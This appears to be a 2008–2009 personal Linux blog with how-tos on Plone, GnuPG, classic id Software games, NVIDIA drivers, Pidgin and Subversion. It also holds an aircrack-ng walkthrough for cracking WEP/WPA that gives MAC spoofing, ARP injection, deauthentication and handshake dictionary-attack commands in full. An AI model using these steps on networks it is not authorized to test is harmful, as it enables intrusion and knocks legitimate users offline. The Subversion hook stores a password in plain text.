scripts = zopepy

Here, we copy the eggs from the [instance] section, and add the Zope software home (lib/python) to the Python path.

When the recipe is run, the script will be created in ./bin/zopepy.

Managing ZCML files
It is important to realize that Zope will not load configure.zcml files automatically for packages that are not in the Products.* namespace. Instead, you must explicitly reference the package. Buildout can create such a reference (known as a ZCML slug) with the zcml option under the [instance] part. Here is how to ensure that borg.project is available to Zope:
[buildout]
...
eggs =
elementtree
borg.project
...
[instance]
...
zcml =
borg.project

Should you need to load an overrides.zcml or a meta.zcml, you can use a syntax like:
zcml =
some.package
some.package-overrides
some.package-meta


Resources:
http://plone.org/documentation/tutorial/buildout/tutorial-all-pages

Wednesday, March 25, 2009

GnuPG

Create your public and private keys
In case you do not have a '.gnupg' directory under your home directory, create it with:
$ mkdir .gnupg

and set up permissions with:
$ chmod 700 .gnupg

Then generate keys with:
$ gpg --gen-key

Choose key type, key length and key expiration.
Then enter your 'User-ID' which consists of 'Name Surname', 'e-mail' and 'comment'.
Then enter your password for using keys.

To publish your public ID:
$ gpg --keyserver pgp.mit.edu --send-keys [e-mail]

Backing up your secret key
This will list keys on your secret keyring:
$ gpg --list-secret-keys

To make backup use:
$ gpg --output [outfile] --armor --export-secret-key [key_identifier as gleaned from above]

This will list keys on your public keyring:
$ gpg --list-keys

To make backup use:
$ gpg --output [outfile] --armor --export [key_identifier as gleaned from above]

key_identifier is usually in the form of something like: ABCDFE01
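To restore from these backups on another machine, import the exported files back into the keyring:
$ gpg --import [outfile]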

Depending on your host, you could also just copy the entire .gnupg directory if you want to do it that way.

Of course there is the paperkey utility if you need to make a paperkey backup of your secret key:
http://www.jabberwocky.com/software/paperkey/

Evolution integration
On the Security tab of your email account's settings dialog, enter your key identifier.
You can find it by listing keys with:
$ gpg --list-keys

Search for the eight characters where 'XXXXXXXX' stands below:
pub 1024D/XXXXXXXX 2004-01-01 Name Surname (comment) [email]

Friday, March 20, 2009

Testing WEP and WPA protection

Aircrack is one of the easiest software bundles for testing the protection of wireless networks. I have an HP Pavilion dv6500 laptop with an Intel PRO/Wireless 3945ABG [Golan] Network Connection wireless card. I'm using openSUSE 11.1 64-bit as the OS, with kernel 2.6.27.19-3.2-default.

Wireless card features
* Chipset: Intel WM3945AG
* IEEE Standards: 802.11a, 802.11b, 802.11g
* PCI ID: 8086:4227

Prerequisites
* gcc
* libopenssl-devel
* sqlite3-devel >=3.6.10
* iw
* http://trac.aircrack-ng.org/attachment/ticket/572/sha-compile-fix-64bit.patch

Installation
$ wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc2.tar.gz
$ tar -zxvf aircrack-ng-1.0-rc2.tar.gz
$ cd aircrack-ng-1.0-rc2
Patch source file sha1-sse2.S using instructions in sha-compile-fix-64bit.patch
$ make SQLITE=true
$ sudo make SQLITE=true install

Using airmon-ng
Stop previously started monitoring:
$ sudo airmon-ng stop wlan0
$ sudo airmon-ng stop mon0

Change MAC of your wlan interface
$ sudo ifconfig wlan0 down
$ sudo macchanger -A wlan0
$ sudo ifconfig wlan0 up
$ ifconfig

Create additional wireless interface mon0 in monitor mode
$ sudo airmon-ng start wlan0
$ iwconfig

Change MAC of newly created interface
$ sudo ifconfig mon0 down
$ sudo macchanger -A mon0
$ sudo ifconfig mon0 up
$ ifconfig

From now on you'll be using mon0 interface.

Using airodump-ng
Find wireless network which is protected with:
$ sudo airodump-ng mon0

and write down the target SSID (ESSID), the MAC address of the access point (BSSID), the channel number (CH) and the encryption type (ENC). When finished, press CTRL+C to exit.

Create directory for dumping information with:
$ cd ~/Documents
$ mkdir data
$ cd data

Run airodump-ng to capture packets from your access point into dumpfile*.cap. Always specify a channel with airodump, because otherwise it will scan through all channels, and that will break your injection attack.
$ sudo airodump-ng --channel [Access Point channel] --bssid [Access Point bssid] -w [dumpfile] [device]
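For example, with hypothetical values of channel 6 and an access point MAC of 00:11:22:33:44:55, the command would look like:
$ sudo airodump-ng --channel 6 --bssid 00:11:22:33:44:55 -w dumpfile mon0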

After a few seconds in airodump-ng, you should notice that there are clients connected to the access point. Connected clients are listed under "STATION" in the lower half of the screen.
Take note of the MAC address of one of the clients - you will use it in the next step. If no clients are connected, this can be your faked MAC.

Using aireplay attack 3 - ARP Injection
Open another terminal window to run an ARP replay attack. After some time, an ARP packet will come through and the #/s figure in the airodump-ng window will increase. If the RXQ (receive quality %) column is above 90, you should be getting a #/s of 200 or higher; more importantly, it should be much higher than it was before.
$ aireplay-ng -3 -b [Access Point bssid] -h [client MAC addr. noted in previous step] [device]
-3 - is the attack number we're using. This attack keeps a record of ARP packets, which are used later for deciphering. There are 6 attacks, numbered 0 - 5.

Using aireplay attack 1 - Fake Authentication Attack
Usually attacks 1 and 0 work together. There are situations when attack 1 will not work (e.g. MAC filtering is on), but it works most of the time, and it's really quick. If you're following along, you should currently have two terminal windows open, running airodump and aireplay attack 3. If not, go back and follow the directions again.
To initiate attack 1 type:
$ aireplay-ng -1 0 -e [essid] -a [Access Point bssid] -h [yours faked client MAC addr] [device]

-1 - This is the attack number we're using. It is a fake authentication attack, making us authenticated with the AP so that we can deauthenticate later, as you'll soon see.
0 - This is the delay between tries, in case it doesn't happen on the first try, for a variety of reasons.

You must have fairly good power showing in airodump for this to work. It needs to be over 40 showing in the power column. Your experience may differ greatly. If all goes well, when you press Enter you should see something like:
10:13:24 Sending authentication request (Open System)
10:13:24 Authentication successful
10:13:24 Sending Association Request
10:13:24 Association successful :-)

What just happened is that you became associated with the AP, meaning that if you lose association, the AP will send out a call to get you back. This is what usually triggers the ARP request. If you take a look at your console running attack 3, it may already be getting lots of data in the #Data and #/s columns. More often than not, though, you'll have to wait for the next step.

There can be many reasons why you won't be able to associate with the AP, meaning this attack failed. First of all, the AP may have MAC filtering on, which may or may not be possible to circumvent. Or you may not be close enough to the AP to associate. It can also be that the encryption is WPA, not WEP, in which case you cannot use this method to inject.

Using aireplay attack 0 - Deauthentication Attack
If your #Data count is flying up, you can skip this step. If not, or if you are trying to crack WPA, read on.
If you followed along until now, you should have a few windows open: one running airodump, another running aireplay attack 3. The last one ran aireplay attack 1, and you're back at the prompt now.

At the prompt type:
$ aireplay-ng -0 10 -e [essid] -a [Access Point bssid] [device]

-0 - is the attack number we're using. It is a deauthentication attack: it tells the AP that we've disassociated, and the client tries to reconnect, sending out an ARP request, which is what attack 3 is waiting for.
10 - is the number of times it should send out the deauthentication. It may not reach the AP on the first try, so we like to do it a couple of times, hence the number 10.

This attack is best used against WPA encryption, while waiting for the HANDSHAKE notice to appear in the upper right part of the dump screen.

If all went well then attack 3 should have picked up an ARP request, and it should be injecting very, very quickly. Go to the window with airodump, and watch with delight as the #Data count flies up.

Using aireplay attack 2 - Interactive Packet Replay
If your #Data count is not flying up, try this attack, in which we look for a large packet to replay:
$ aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [Access Point bssid] -h [client MAC addr. noted in previous step] [device]

When asked whether to use this packet, say yes:
Use this packet: y

Final step - aircrack
For WEP encryption, wait a few minutes until #Data reaches 50,000. This should be enough, but we leave the attack running just in case. Remember: for WEP you are waiting for more data, while for WPA you are waiting for the HANDSHAKE notice to appear in the upper right part of the dump screen when some client connects to the access point. So for WEP use aireplay attacks 3, 1 and 0 in that order, and for WPA use attacks 3 and 0.

After collecting enough data, or after getting a handshake, you can disconnect and continue elsewhere with the captured data. Open another terminal window and run aircrack-ng to start the key search:
$ sudo aircrack-ng -r masterdb wpa*.cap -w '/path/to/password.lst'

After some time you will have the key.

Resources
http://www.aircrack-ng.org/doku.php?id=tutorial
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks

Tuesday, March 10, 2009

Doom on Linux

Doom 1 and 2

Prerequisites:
* SDL-32bit
* SDL_mixer-32bit

Download Doom legacy engine from:
$ wget http://prdownloads.sourceforge.net/doomlegacy/legacy_142_win32.zip

Copy the *.wad files (doom.wad, doom2.wad, etc.) to the extracted directory.

Start game with:
$ ./lsdldoom -opengl -IWAD doom.wad

where doom.wad is the name of the *.wad file you want to start.

Doom3 and RoE

Download the doom3 installer from:
$ wget ftp://ftp.idsoftware.com/idstuff/doom3/linux/

Create directory structure with:
$ mkdir -p /usr/local/games/doom3/base
$ mkdir -p /usr/local/games/doom3/d3xp

Now copy installer to doom3 directory with:
$ sudo cp doom3-linux-1.3.1.1304.x86.run /usr/local/games/doom3/

Start installer and install doom3
$ cd /usr/local/games/doom3
$ sudo sh doom3-linux-1.3.1.1304.x86.run

Start the game (after linking the game data files below) with:
$ ./doom3 +set s_driver oss
$ ./doom3 +set s_driver oss +set fs_game d3xp

Create symbolic links with:
$ sudo ln -s /media/doom3/base/pak000.pk4 /usr/local/games/doom3/base
$ sudo ln -s /media/doom3/base/pak001.pk4 /usr/local/games/doom3/base
$ sudo ln -s /media/doom3/base/pak002.pk4 /usr/local/games/doom3/base
$ sudo ln -s /media/doom3/base/pak003.pk4 /usr/local/games/doom3/base
$ sudo ln -s /media/doom3/base/pak004.pk4 /usr/local/games/doom3/base

$ sudo ln -s /media/doom3/d3xp/pak000.pk4 /usr/local/games/doom3/d3xp

Resource:
http://zerowing.idsoftware.com/linux/doom/

Sunday, March 8, 2009

Wolfenstein on Linux

Wolfenstein 3D

Well, this is the first FPS I played, on a 386 PC, more than 15 years back in 1993. It was an extraordinary experience. Although new games are much more realistic and give you a better atmosphere, I can't forget this little fellow. So I tried to revive him after 15 years on my Linux machine.

You'll need to download source code for wolf engine:
$ wget http://www.stud.uni-karlsruhe.de/~uvaue/chaos/bins/Wolf4SDL-1.6-src.zip

Additional System Requirements:
* Original game data files
* libSDL
* libSDL_Mixer

Using YaST or any other package manager, install the SDL-devel and SDL_mixer-devel packages.
Extract the downloaded source code and copy the original game files (*.wl6) to the extracted directory. Don't forget to rename the original game files to lowercase.
$ cd /path/to/extracted/source/Wolf4SDL-1.6-src
$ make

If you can't find original game files, then download shareware 1.4 version from:
$ wget http://www.users.globalnet.co.uk/~brlowe/wolf3d14.zip

and copy the *.wl1 files instead. Again, rename the files to lowercase. If you are using the shareware game files you will also need to change the version.h file before compiling: define CARMACIZED and UPLOAD and comment out the others. It is well documented, so editing it won't be a problem.
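For illustration, the relevant part of version.h would end up looking something like this (a sketch; the exact set of remaining switches depends on the Wolf4SDL release):

/* version.h -- shareware build (illustrative sketch) */
#define CARMACIZED
#define UPLOAD
/* leave the registered/Spear-specific defines commented out */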

After compiling, start the game by running the wolf3d executable:
$ ./wolf3d

Reference:
http://www.happypenguin.org/show?Wolf4SDL


Return to Castle Wolfenstein

Additional System Requirements:
* Original game data files
* libstdc++-libc6.2-2.so, which you can get by installing the compat package using YaST or zypper
$ zypper in compat

Create directory structure with:
$ mkdir -p /usr/local/games/wolfenstein/main

Download installer from:
$ wget ftp://ftp.idsoftware.com/idstuff/wolf/linux/wolf-linux-1.41b.x86.run

Copy installer to main directory with:
$ sudo cp wolf-linux-1.41b.x86.run /usr/local/games/wolfenstein

Run installer with:
$ sudo sh wolf-linux-1.41b.x86.run

Copy or create links for game data files:
$ sudo ln -s /media/Wolfenstein/Main/mp_pak0.pk3 /usr/local/games/wolfenstein/main
$ sudo ln -s /media/Wolfenstein/Main/pak0.pk3 /usr/local/games/wolfenstein/main
$ sudo ln -s /media/Wolfenstein/Main/sp_pak1.pk3 /usr/local/games/wolfenstein/main

Start single player with:
$ sudo bash -c 'echo "wolfsp.x86 0 0 direct" > /proc/asound/card0/pcm0p/oss'
$ sudo bash -c 'echo "wolfsp.x86 0 0 disable" > /proc/asound/card0/pcm0c/oss'
$ ./wolfsp

Start multiplayer with:
$ sudo bash -c 'echo "wolf.x86 0 0 direct" > /proc/asound/card0/pcm0p/oss'
$ sudo bash -c 'echo "wolf.x86 0 0 disable" > /proc/asound/card0/pcm0c/oss'
$ ./wolf

Resource:
http://zerowing.idsoftware.com/linux/wolf/
http://www.happypenguin.org/show?Return%20To%20Castle%20Wolfenstein

Tuesday, March 3, 2009

Kernel upgrade removes NVIDIA module

Using YOU (YaST Online Update) on openSUSE, I upgraded to a new kernel version; after restarting the system, the NVIDIA module could not be found and I was back in runlevel 3.
To get back to runlevel 5 you have to edit your /etc/X11/xorg.conf and comment out the driver line with # like this:
# driver "nvidia"

or change "nvidia" to "nv" so it looks like this
driver "nv"

Restart your system or try to start X server using:
$ startx

After you reach init 5, go to YaST and search installed packages with the NVIDIA search key. Remove those installed packages to get rid of the old, incompatible drivers.

From the NVIDIA download page, download the latest driver that fits your system:
http://www.nvidia.com/object/unix.html

If you are not sure which driver is right for you, try this link:
http://www.nvidia.com/Download/index.aspx

Prerequisites
* compiler gcc,
* program make and
* package kernel-source

If you don't have them installed you can do it using YaST.

Go to runlevel 3 by typing the following command as root in one of the consoles (which you can access by pressing Ctrl-Alt-F1):
$ init 3

Now go to the directory containing the drivers.
$ cd /the/path/where/you/saved/the/drivers/from/nvidia/website

Now simply type the following and follow the instructions:
$ sh NVIDIA-Linux-x86_64-180.29-pkg2.run -q

The installer will try to compile the nvidia module for your new kernel version.

The next step is to configure X.org to use the new nvidia drivers. To do this, type the following:
$ sax2 -r -m 0=nvidia

To go back to runlevel 5 type:
$ init 5

After each kernel update you need to run:
$ sh NVIDIA-Linux-x86_64-180.29-pkg2.run -K

Friday, January 30, 2009

Quakes on Linux

Quake I

Make your destination directory:
$ sudo mkdir -p /usr/local/games/quake/id1

Download latest stable official release of darkplaces engine and mod from:
http://icculus.org/twilight/darkplaces/download.html

The engine is enough, but if you want some improved lighting effects you'll need the mod too.
$ wget http://icculus.org/twilight/darkplaces/files/darkplacesengine20090128.zip
$ wget http://icculus.org/twilight/darkplaces/files/darkplacesmod20080808.zip

After extracting to the ~/Quake directory, copy the darkplaces executable that suits your system:
$ sudo cp ~/Quake/darkplacesengine20081004/darkplaces-linux-x86_64-sdl /usr/local/games/quake

Now copy files from original windows Quake CD or destination directory of windows installation:
$ sudo cp -rv /media/Quake/ID1/* /usr/local/games/quake/id1/ > ~/Desktop/files.txt
After copying, make sure all files listed in files.txt are lowercase.

Make your launch script with:
$ joe ~/Desktop/quake

Add this content:
#!/bin/sh
cd /usr/local/games/quake
./darkplaces-linux-x86_64-sdl

Save and make this file executable:
$ sudo chmod 775 quake

Any mission packs or downloaded mods just need to be extracted into the destination directory /usr/local/games/quake/. Activate installed mods with the "Browse mods" menu option inside the game.

Quake II

Make your destination directory:
$ sudo mkdir -p /usr/local/games/quake2/baseq2

Download binary RPM engine from http://www.chez.com/colinf/rpms/quake2/ :
$ wget http://www.chez.com/colinf/rpms/quake2/quake2-r0.16.1-io1.i386.rpm
$ sudo rpm -Uvh quake2-r0.16.1-io1.i386.rpm


From original QuakeII windows CD or destination directory of windows installation copy content of baseq2 folder to /usr/local/games/quake2/baseq2 :
$ sudo cp -rv /media/win/games/quake2/baseq2/* /usr/local/games/quake2/baseq2
Make sure all copied files are lowercase.

To start game execute:
$ /usr/local/games/quake2/quake2.sh

For any mission packs you just need to extract the pak files into a destination directory, for example /usr/local/games/quake2/rogue.
After extracting, start quake2 with the set game 'value' parameter:
$ ./sdlquake2 +set basedir /usr/local/games/quake2 +set game rogue

Quake III

Make your destination directory:
$ sudo mkdir -p /usr/local/games/quake3/baseq3

From the original Quake III Windows CD, or the destination directory of a Windows installation, copy pak0.pk3 from the baseq3 folder to /usr/local/games/quake3/baseq3 :

$ sudo cp /media/win/games/quake3/baseq3/pak0.pk3 /usr/local/games/quake3/baseq3


Download Quake3 installer:
$ wget ftp://ftp.idsoftware.com/idstuff/quake3/linux/linuxq3apoint-1.32b-3.x86.run

Move it to destination directory:
$ mv ~/Desktop/linuxq3apoint-1.32b-3.x86.run /usr/local/games/quake3

Start the installation and follow the instructions on your screen (you can answer “Yes” to every question you are asked during the installation):
$ cd /usr/local/games/quake3
$ linux32 sh /usr/local/games/quake3/linuxq3apoint-1.32b-3.x86.run

Download patch:
$ wget ftp://ftp.idsoftware.com/idstuff/quake3/quake3-1.32c.zip

After extracting, copy the content of the linux directory over the files in the quake3 destination path:
$ sudo cp ~/Desktop/linux/* /usr/local/games/quake3

To start game execute:
$ /usr/local/games/quake3/quake3

If you experience problems with sound use:
$ sudo bash -c 'echo "quake3.x86 0 0 direct" > /proc/asound/card0/pcm0p/oss'
$ sudo bash -c 'echo "quake3.x86 0 0 disable" > /proc/asound/card0/pcm0c/oss'

If you experience hangs during play start quake3 with:
$ ./quake3.x86 +set s_musicvolume -1

Quake 4

Download installer with:
$ cd ~/Desktop
$ wget ftp://ftp.idsoftware.com/idstuff/quake4/linux/quake4-linux-1.4.2.x86.run
Make your destination directory:
$ mkdir -p /usr/local/games/quake4/q4base

Quake 4 is very big, so you may want to create links instead of copying:
$ sudo ln -s /media/win/games/quake4/Setup/Data/q4base/*.pk4 /usr/local/games/quake4/q4base
$ sudo chmod -Rv 775 q4base/*.pk4

Move installer to your destination directory and execute:
$ cd /usr/local/games/quake4
$ sudo mv ~/Desktop/quake4-linux-1.4.2.x86.run .
$ sudo sh quake4-linux-1.4.2.x86.run

Start quake with:
$ ./quake4 +set s_driver oss

Monday, January 12, 2009

Install msn-pecan protocol plugin to Pidgin

If you have problems connecting to an MSN account with Pidgin and receive an error like
Unable to retrieve MSN Address Book

then the msn-pecan protocol plugin helps.

Make sure you have the following packages installed:
libpurple-devel
autoconf
automake
gcc
gcc-c++
make

You can install them by typing:
$ sudo zypper install libpurple-devel autoconf automake gcc gcc-c++ make

To download the latest version of the msn-pecan protocol plugin for Pidgin check this link:
http://code.google.com/p/msn-pecan/downloads/list

Download the latest source tar.bz2 package. In my case:
$ wget http://msn-pecan.googlecode.com/files/msn-pecan-0.0.17.tar.bz2

$ tar -xvjf msn-pecan-0.0.17.tar.bz2
$ cd msn-pecan-0.0.17
$ make
$ sudo make install

This will install the libmsn-pecan.so module at /usr/lib/purple-2/libmsn-pecan.so
Try restarting Pidgin and look for the WLM protocol module. If it's not there, the problem is probably a wrong installation path.

Find your module installation path using:
$ pidgin --debug

If you're using a 64-bit OS you need to install it to /usr/lib64/purple-2.
So just do the following:
$ sudo mv /usr/lib/purple-2/libmsn-pecan.so /usr/lib64/purple-2
$ sudo rmdir /usr/lib/purple-2

Restart Pidgin and change the protocol from MSN to WLM. It works fine.
Cheers!

Monday, December 29, 2008

Plone deployment using buildout

Prerequisites
* python2.4
* python-devel
* python-imaging - Python Imaging Library
* python-setuptools - setuptools

Under Ubuntu use:
$ sudo apt-get install python2.4 build-essential python2.4-dev python-imaging python-setuptools

Under openSUSE use:
$ sudo zypper in python-2.4 python-2.4-devel python-2.4-imaging python-2.4-xml

If you're using Linux and your distribution doesn't provide a package for setuptools, download ez_setup.py and run it with:
$ python2.4 ez_setup.py

Note: I got an error here saying that the directory structure doesn't exist. In that case just create it with mkdir and try again:
$ sudo mkdir -p /usr/local/lib64/python2.4/site-packages

This will download and install setuptools and the easy_install script. Watch the console output to see where easy_install was installed. If this directory is not in your system PATH, add it by appending the following two lines to the end of $HOME/.bash_profile for one user, /etc/profile for all users except root, and /root/.bash_profile for the root user:
PATH=$PATH:/path/to/easy_install
export PATH

Installation
$ sudo easy_install-2.4 -U ZopeSkel
$ cd /home/'your_username'
$ paster create --list-templates
$ paster create -t plone3_buildout myPloneProject
-----------------------------------------------------------------------------------
Enter zope2_install (Path to Zope 2 installation; leave blank to fetch one) ['']:
Enter plone_products_install (Path to directory containing Plone products; leave blank to fetch one) ['']:
Enter zope_user (Zope root admin user) ['admin']:
Enter zope_password (Zope root admin password) ['']: passwd
Enter http_port (HTTP port) [8080]:
Enter debug_mode (Should debug mode be "on" or "off"?) ['off']: on
Enter verbose_security (Should verbose security be "on" or "off"?) ['off']: on
-----------------------------------------------------------------------------------

Enter the directory created from the template:
$ cd myPloneProject

Create the base directory structure for the created template, including scripts and the latest version of the zc.buildout egg:
$ python2.4 bootstrap.py

The next step is time-consuming, so after typing the next command go for a coffee. If you have a download running in the background, stop it before starting the online build with:
$ ./bin/buildout -v

This reads the generated buildout.cfg file and executes its various "parts", setting up Zope, creating a Zope instance, downloading and installing Plone.

You will need to run ./bin/buildout again each time you change buildout.cfg. If you do not want buildout to go online and look for updated versions of eggs or download other archives, you can run it in non-updating, offline mode using the -o switch:
$ ./bin/buildout -o

Start your Zope instance in foreground so you can see debug info in console:
$ ./bin/instance fg

Start your Zope instance as background process in daemon mode:
$ ./bin/instance start
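To check that the instance is answering, assuming the default HTTP port 8080 chosen above:
$ curl -I http://localhost:8080/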

To run tests use:
$ ./bin/instance test -s plone.portlets

Stop your instance with:
$ ./bin/instance stop

Resource:
http://plone.org/documentation/tutorial/buildout/tutorial-all-pages

Wednesday, December 17, 2008

Subversion with apache on Centos

I used CentOS 4 as the OS on which I installed Subversion with Apache. It was a painful three days, but it was a success in the end. Before we start, I have to mention a couple of important things:
subversion 1.4.x will work with apache-2.0.x because they rely on the APR 0.9.x module, and
subversion 1.5.x will work with apache-2.2.x because they rely on the APR 1.3.x module.
APR 0.9.x and APR 1.3.x are not compatible, and because of that, subversion 1.5.x will not work with apache-2.0.x. The same probably goes for the subversion 1.4.x and apache-2.2.x combination. When installing the subversion modules for apache from source you'll need to tell the configure script where the APR and APR-UTIL libraries are. You can use these libraries from the apache source or from the subversion source. I decided to use the APR and APR-UTIL libraries from the apache source.

Subversion depends on a lot of other programs and libraries which need to be installed before the subversion package can be used, so to simplify things I'll try to use yum as much as possible.

Update your version of apache and install subversion that fits this version of apache using yum:
yum upgrade httpd

Add repos to yum:
joe /etc/yum.repos.d/dag.repo

[dag]
name=Dag RPM Repository for Red Hat Enterprise Linux
baseurl=http://apt.sw.be/redhat/el$releasever/en/$basearch/dag
gpgkey=http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt
gpgcheck=1
enabled=1
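Since gpgcheck is enabled, yum will want the repository's GPG key; it should offer to import it on first use, or you can import it manually up front:
rpm --import http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt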

Then install these packages:
yum install httpd-devel
yum install subversion

Check the version of your installed apache (2.0.52 in my case) using:
yum info httpd

and download the appropriate source using:
wget http://apache.blic.net/httpd/httpd-2.0.63.tar.gz

There is no source for 2.0.52 anymore, so I used 2.0.63 with fingers crossed.
tar xfz httpd-2.0.63.tar.gz
cd httpd-2.0.63

cd apr
./configure --prefix=/usr/local/apr
make
make install
cd ..

cd apr-util
./configure --prefix=/usr/local/apr-utils --with-apr=/usr/local/apr/
make
make install
cd ..

Check the version of your installed subversion (1.4.6 in my case) using:
yum info subversion

and download the appropriate source using:
wget http://subversion.tigris.org/downloads/subversion-deps-1.4.6.tar.gz
wget http://subversion.tigris.org/downloads/subversion-1.4.6.tar.gz

tar xfz subversion-1.4.6.tar.gz
tar xfz subversion-deps-1.4.6.tar.gz
cd subversion-1.4.6

rm -f /usr/local/lib/libsvn*
rm -f /usr/local/lib/libapr*
rm -f /usr/local/lib/libexpat*
rm -f /usr/local/lib/libneon*
sh ./autogen.sh

./configure --with-apxs=/usr/sbin/apxs \
--with-apr=/usr/local/apr/ \
--with-apr-util=/usr/local/apr-utils/
make
make install

At this point the two svn modules will have been added to your httpd.conf file, which is the whole reason we compiled from source.

Make your project for the first revision of the repository:
mkdir -v /usr/local/svn-projects
mkdir -v /usr/local/svn-projects/htdocs
joe /usr/local/svn-projects/htdocs/index.html
chown -Rv apache.apache /usr/local/svn-projects
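If you just need a placeholder page for the first revision, you can skip the editor and create one directly (the contents are arbitrary):
echo '<html><body><h1>First revision</h1></body></html>' > /usr/local/svn-projects/htdocs/index.html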

Make your repository:
mkdir -v /usr/local/subversion/
/usr/local/bin/svnadmin create --fs-type fsfs /usr/local/subversion/repository
chown -Rv apache.apache /usr/local/subversion
ls /usr/local/subversion/repository

Edit httpd.conf and check that the two svn modules are loaded:
LoadModule dav_svn_module /usr/lib/httpd/modules/mod_dav_svn.so
LoadModule authz_svn_module /usr/lib/httpd/modules/mod_authz_svn.so

Add this code to apache httpd.conf:
<Location /subversion>
DAV svn
SVNPath /usr/local/subversion/repository/
AuthType Basic
AuthName "Subversion repository"
AuthUserFile /usr/local/subversion/repository/conf/svn-auth-file
Require valid-user
</Location>

Add new users. For the first user:
htpasswd -cm /usr/local/subversion/repository/conf/svn-auth-file {user-name}

For every other user:
htpasswd -m /usr/local/subversion/repository/conf/svn-auth-file {user-name}
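Note that Apache has to be restarted before the new Location block takes effect (the restart command is at the end of this post), so do that first if the http:// URLs below refuse to work. Once it is up, you can verify that authentication is wired correctly by listing the (still empty) repository root:
/usr/local/bin/svn list http://127.0.0.1/subversion/ --username {user-name}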

Prepare files for repository and import your project to repository:
mkdir -pv /tmp/subversion-layout/{branches,tags}
mv -v /usr/local/svn-projects/htdocs /tmp/subversion-layout/trunk
export SVN_EDITOR=joe
/usr/local/bin/svn import /tmp/subversion-layout/ http://127.0.0.1/subversion/
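The import opens the editor set in SVN_EDITOR so you can type a log message; if you prefer, you can pass the message inline instead:
/usr/local/bin/svn import -m "initial project layout" /tmp/subversion-layout/ http://127.0.0.1/subversion/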

Make your working copy:
cd /usr/local/svn-projects/
/usr/local/bin/svn checkout http://127.0.0.1/subversion/trunk/ htdocs

Make post-commit hook to get fresh working copy:
cp -v /usr/local/subversion/repository/hooks/post-commit.tmpl /usr/local/subversion/repository/hooks/post-commit
chmod +x /usr/local/subversion/repository/hooks/post-commit

Edit the post-commit hook by commenting out the last two lines and adding one line, like this:
#commit-email.pl "$REPOS" "$REV" commit-watchers@example.org
#log-commit.py --repository "$REPOS" --revision "$REV"
/usr/bin/svn update /usr/local/svn-projects/htdocs/ --username svn_user --password svn_pass --non-interactive >> /usr/local/subversion/repository/logs/post-commit.log

Make log file for created hook:
mkdir -v /usr/local/subversion/repository/logs/
touch /usr/local/subversion/repository/logs/post-commit.log
chown -Rv apache.apache /usr/local/subversion/ /usr/local/svn-projects/

Restart your apache and you'll have your first revision working:
/usr/sbin/httpd -k restart
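On CentOS you can also use the bundled init script to do the same:
service httpd restart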

Cheers!